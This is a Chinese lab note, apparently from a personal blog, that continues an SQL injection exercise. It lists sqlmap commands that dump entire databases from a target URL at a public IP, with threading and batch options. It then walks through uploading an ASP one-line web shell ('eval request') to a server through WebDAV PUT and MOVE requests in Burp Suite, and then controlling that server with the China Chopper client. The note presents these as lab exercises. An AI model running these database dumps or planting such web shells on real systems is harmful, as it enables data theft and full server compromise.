(9)SQL注入漏洞(实验)

2021-9-16

--续

六、脱库(ctrl+c退出)

脱数据库

--dump-all

sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all (脱所有数据库,动静太大,不能随便脱) 

sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump   (一般用这个)

七、调线程

--thread       调线程  范围1-10

sqlmap -u "http://106.52.39.144/Less-1/?id=1" -D security --dump --thread 10

--batch   不会再跳出询问选择 ,按照默认选择进行选择

sqlmap -u "http://106.52.39.144/Less-1/?id=1" --dump-all --thread 10 --batch

实验查网页漏洞

一、所用信息

网站IP:192.168.1.62

病毒:一句话木马病毒(<%eval request("chopper")%>)

菊花马(文件)

Burpsuit所用命令:OPTION(看)

PUT    (传)

MOVE  (改)

Destination:http://192.168.1.62/1.asp

  所用工具:burpsuit、菜刀

二、实验步骤

1、先将192.168.1.62在burpsuit中进行(proxy)抓包——右击-REPEATER-RESPONSE

2、用(options)命令看允许的命令。将第一行前缀改成OPTIONS-看里面允许了什么-右面那一栏-倒数二三行

3、再用put命令上传文件。

改的命令为:(1)、将txt文件的文件名改成xjj

  • 、将Destination:http://192.168.1.62/1.asp插入user命令下面
  • 、在最后一行空一行加入一句话木马(密码可以自己设)
  • MOVE命令来改txt命令的后缀名
  • 将DISTINATION后面的域名复制下来-添加进菜刀并输入密码-双击-拖入菊花马程序

6、再次进入网站-输入密码-即成功

上一篇:8.php 数据类型


下一篇:Mqtt Server端的安装